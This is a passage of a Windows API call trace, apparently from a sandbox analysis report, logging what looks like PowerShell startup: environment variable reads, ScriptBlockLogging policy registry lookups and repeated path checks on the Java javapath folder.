Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0138.766] WindowsDeleteString () returned 0x0 [0138.766] Release () returned 0x2 [0138.766] CoGetContextToken (in: pToken=0xb156f8d040 | out: pToken=0xb156f8d040) returned 0x0 [0138.766] CoGetContextToken (in: pToken=0xb156f8cf40 | out: pToken=0xb156f8cf40) returned 0x0 [0138.766] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0138.766] AddRef () returned 0x4 [0138.766] Release () returned 0x3 [0138.778] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0138.847] GenericStreamBase::Write () returned 0x0 [0138.847] GenericStreamBase::Write () returned 0x0 [0138.847] CoCreateGuid (in: pguid=0x7ffbd076e6a0 | out: pguid=0x7ffbd076e6a0*(Data1=0x783fa7c7, Data2=0xbfe0, Data3=0x4642, Data4=([0]=0x88, [1]=0x6b, [2]=0x84, [3]=0x77, [4]=0xd2, [5]=0x49, [6]=0x3d, [7]=0x7a))) returned 0x0 [0138.847] GenericStreamBase::Write () returned 0x0 [0138.851] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0138.851] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0138.851] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0138.851] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0138.851] Release () returned 0x3 [0138.851] CoGetContextToken (in: pToken=0xb156f8c180 | out: pToken=0xb156f8c180) returned 0x0 [0138.851] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0138.853] WindowsCreateString () returned 0x0 [0138.854] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0138.854] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0138.854] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0139.605] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0xb156f8e6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.729] EtwEventActivityIdControl () returned 0x0 [0139.729] EtwEventActivityIdControl () returned 0x0 [0139.729] EtwEventActivityIdControl () returned 0x0 [0139.735] EtwEventActivityIdControl () returned 0x0 [0139.735] EtwEventActivityIdControl () returned 0x0 [0139.735] EtwEventActivityIdControl () returned 0x0 [0139.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb156f8d5e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb156f8d5e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb156f8d640, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8e748 | out: phkResult=0xb156f8e748*=0x0) returned 0x2 [0139.856] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8e748 | out: phkResult=0xb156f8e748*=0x0) returned 0x2 [0139.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb156f8d590, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.862] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0xb156f8e0e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0139.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xb156f8ded0, nSize=0x80 | out: lpBuffer="") returned 0x3a [0139.865] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xb156f8de80, nSize=0x80 | out: lpBuffer="") returned 0x3a [0139.866] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xb156f8def0, nSize=0x80 | out: lpBuffer="") returned 0x9d [0139.866] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xb156f8dec0, nSize=0x9d | out: lpBuffer="") returned 0x9c [0139.873] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.873] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1e3510c91c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.873] CoTaskMemFree (pv=0x1e3510c91c0) [0139.876] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.876] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.877] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.886] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0139.886] CoTaskMemFree (pv=0x1e3510c91c0) [0139.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.887] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.887] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.887] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.888] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.888] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.889] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.889] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.889] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.889] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.889] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.889] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.890] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.890] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.890] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.890] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.891] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.891] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.891] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.891] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.891] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.892] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.893] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.893] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.894] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.894] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.894] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 